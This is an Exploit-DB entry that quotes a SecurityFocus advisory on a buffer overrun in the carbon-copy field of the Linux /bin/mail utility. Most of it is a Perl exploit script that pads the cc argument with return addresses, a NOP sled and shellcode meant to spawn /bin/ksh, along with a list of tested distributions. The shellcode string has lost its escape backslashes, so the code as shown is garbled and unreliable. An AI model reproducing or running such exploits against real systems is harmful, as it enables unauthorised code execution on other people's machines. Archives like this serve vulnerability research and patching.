https://www.exploit-db.com/exploits/22695

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/7760/info

A vulnerability has been discovered in the Linux /bin/mail utility. The problem occurs when processing excessive data within the carbon copy field. Due to insufficient bounds checking while parsing this information it may be possible to trigger a buffer overrun.

An attacker could exploit this issue to execute arbitrary commands. It should be noted that local exploitation may be inconsequential, however a malicious e-mail message or CGI interface could be a sufficient conduit for remote exploitation.

#!/usr/bin/perl
#
#
# Released under the GPL by a bored Vulndev member
# email: [email protected]
#
# The User 'cannot have expectations of privacy'. 
#
# For the Script to work you will need to:
# Run it, press 'return' once, then '.' then 'return'
#result = Shell (if you have /bin/ksh!)
#
# Anything you do with this script is your own problem,
# dont forget if you print it off, recycle!
# if you dont print it off, do so anyway 
# and use if for expensive toilet paper.
# 
# Systems Tested on: (Please let me know the outcome of your own box)
# Redhat 9.0 -- Vulnerable
# Redhat 9.0 with St Jude and St Michael -- Not Vulnerable
# Slackware 8.1 -- Vulnerable
# Slackware 9.0 -- Not Vulnerable
# Debian 3.0 (Testing) -- May be vulnerable.. needing comfirmation.
$shellcode = 
"xebx1fx5fx89xfcx66xf7xd4x31xc0x8ax07".
"x47x57xaex75xfdx88x67xffx48x75xf6x5b".
"x53x50x5ax89xe1xb0x0bxcdx80xe8xdcxff".
"xffxffx01x2fx62x69x6ex2fx6bx73x68x01".
"";
$ret = 0xbffff714;
$buf = 8232;
$egg = 9000;
$nop = "x90";
$offset = 0;
if (@ARGV == 1) 
{ 
$offset = $ARGV[0];
}
$addr = pack('l',($ret + $offset));
for ($i = 0; $i < $buf; $i += 4)
{
$buffer .= $addr;
}
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) 
{
 $buffer .= $nop;
}
$buffer .= $shellcode;
exec("mail",'-s','Test','-c',$buffer,'root@localhost');
sendkeys("{CR}");
sendkeys(".");